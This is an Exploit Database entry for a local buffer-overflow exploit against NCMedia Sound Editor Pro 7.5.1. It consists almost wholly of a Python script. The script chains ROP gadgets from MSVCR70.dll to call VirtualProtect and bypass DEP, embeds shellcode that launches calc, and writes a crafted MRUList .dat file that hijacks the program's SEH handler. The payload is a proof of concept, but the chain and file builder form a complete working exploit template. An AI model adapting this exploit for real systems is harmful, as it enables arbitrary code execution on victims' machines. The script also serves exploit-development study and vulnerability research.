NCMedia Sound Editor Pro 7.5.1 – Local Overflow (SEH + DEP Bypass)

• Exploit Database
• 9 阅读

• 作者： b33f
  日期： 2012-10-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/21713/

• #!/usr/bin/python
  
  #---------------------------------------------------------------------------#
  # Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP#
  # Author: b33f - http://www.fuzzysecurity.com/#
  # OS: Windows 7 Pro SP1 (probably universal across 32-bit)#
  # POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/ #
  # Software: http://www.soundeditorpro.com/#
  # HOWTO: put the *.dat file in [USER]\Roaming\Sound Editor Pro\ #
  #open -> click "File" menu -> calc ;))#
  #---------------------------------------------------------------------------#
  # Curiously enough, the only thing that went through the mind of the#
  # ROP-Chain as it was executed was "Oh no, not again"!#
  #---------------------------------------------------------------------------#
  
  import sys, socket, struct 
  
  file="MRUList201202.dat"
  
  #--------------------------------------------------------------------------------------------------------------#
  # Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"... #
  #--------------------------------------------------------------------------------------------------------------#
  rop = struct.pack('<L',0x7c0126bc)# XCHG EAX,EBP # ADD AL,7C # RETN \
  rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN |
  rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B | MOV VP -> ESI
  rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN/
  #--------------------------------------------------------------------------------------------------------------#
  rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN\
  rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe]| JMP ESP -> EBP
  rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll] |
  rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN /
  #--------------------------------------------------------------------------------------------------------------#
  rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN\
  rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes) | Executable Size -> EBX
  rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
  rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN/
  #--------------------------------------------------------------------------------------------------------------#
  rop += struct.pack('<L',0x7c026484) # POP EDI # RETN\ROP-NOP -> EDI
  rop += struct.pack('<L',0x7c034e02) # ROP-NOP /
  #--------------------------------------------------------------------------------------------------------------#
  rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN\
  rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40| newProtect -> EDX
  rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
  rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN/
  #--------------------------------------------------------------------------------------------------------------#
  rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN\RW lpOldProtect -> ECX
  rop += struct.pack('<L',0x7c049001) # lpOldProtect/
  #--------------------------------------------------------------------------------------------------------------#
  rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN\NOP padding -> EAX
  rop += struct.pack('<L',0x90909090) # NOP /
  #--------------------------------------------------------------------------------------------------------------#
  rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN|PUSHAD -> pwnd!!
  #--------------------------------------------------------------------------------------------------------------#
  
  #----------------------------------
  # Greets to SkyLined, you do great work with shellcode!!
  #----------------------------------
  calc = (
  "\x31\xD2"#
  "\x52"#
  "\x68\x63\x61\x6C\x63"# Stack has arguments for
  "\x89\xE6"# WinExec -> calc
  "\x52"#
  "\x56"########
  "\x64\x8B\x72\x30"#
  "\x8B\x76\x0C"#
  "\x8B\x76\x0C"# Found Kernel32
  "\xAD"# base address
  "\x8B\x30"#
  "\x8B\x7E\x18"########
  "\x8B\x5F\x3C"# Found export table offset
  "\x8B\x5C\x1F\x78"########
  "\x8B\x74\x1F\x20"# Found export names table
  "\x01\xFE"########
  "\x8B\x4C\x1F\x24"# Found export ordinals table
  "\x01\xF9"########
  "\x42"#
  "\xAD"# Found WinExec ordinal
  "\x81\x3C\x07\x57\x69\x6E\x45"#
  "\x75\xF5"########
  "\x0F\xB7\x54\x51\xFE"#
  "\x8B\x74\x1F\x1C"#
  "\x01\xFE"# Pop calc ;))
  "\x03\x3C\x96"#
  "\xFF\xD7") #
  
  #----------------------------------
  # badchars -> '\x00\x0d\x0a'
  # 0x0040e02a {pivot 1092}# ADD ESP,444 # RETN [SoundEditorPro.exe]
  # ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
  #----------------------------------
  b00m = "\x90"*10 + calc
  poc = "\x02\x4E\x03\x7C"*61 + rop + b00m + "\x41"*(3880-len(rop + b00m)) + "\x2A\xE0\x40\x00"
  
  try:
  print "[*] Creating exploit file...\n"
  writeFile = open (file, "w")
  writeFile.write( poc )
  writeFile.close()
  print "[*] File successfully created!"
  except:
  print "[!] Error while creating file!"